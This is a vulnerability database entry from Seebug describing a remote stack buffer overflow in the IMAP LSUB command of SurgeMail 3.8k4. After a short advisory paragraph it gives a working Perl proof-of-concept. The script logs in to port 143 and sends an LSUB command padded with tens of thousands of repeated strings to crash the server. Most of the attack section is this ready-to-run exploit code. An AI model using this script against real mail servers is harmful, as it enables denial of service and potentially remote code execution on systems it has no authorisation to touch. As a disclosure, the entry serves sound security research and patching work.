SurgeMail 3.8 - IMAP LSUB Command Remote Stack Buffer Overflow Vulnerability

ID SSV:84790
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.


SurgeMail is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input.

Successfully exploiting this issue may allow remote attackers to execute arbitrary machine code in the context of the affected service. Failed exploit attempts will likely result in denial-of-service conditions.

SurgeMail 3.8k4 is vulnerable; other versions may also be affected.

#       Surgemail stack overflow PoC exploit - latest version
#	Coded by Leon Juranic <>

use IO::Socket;

$host = "";
$user = "test";
$pass = "test";
$str = "//AA:";

$sock = IO::Socket::INET->new(PeerAddr => $host,
        PeerPort => "143",
        Proto    => "tcp") || die ("Cannot connect!!!\n");

        print $a = <$sock>;
        print $sock "a001 LOGIN $user $pass\r\n";
        print $a = <$sock>;
        print $sock "a002 LSUB " . $str x 12000 . " " . $str x 21000 . "\r\n";
        print $a = <$sock>;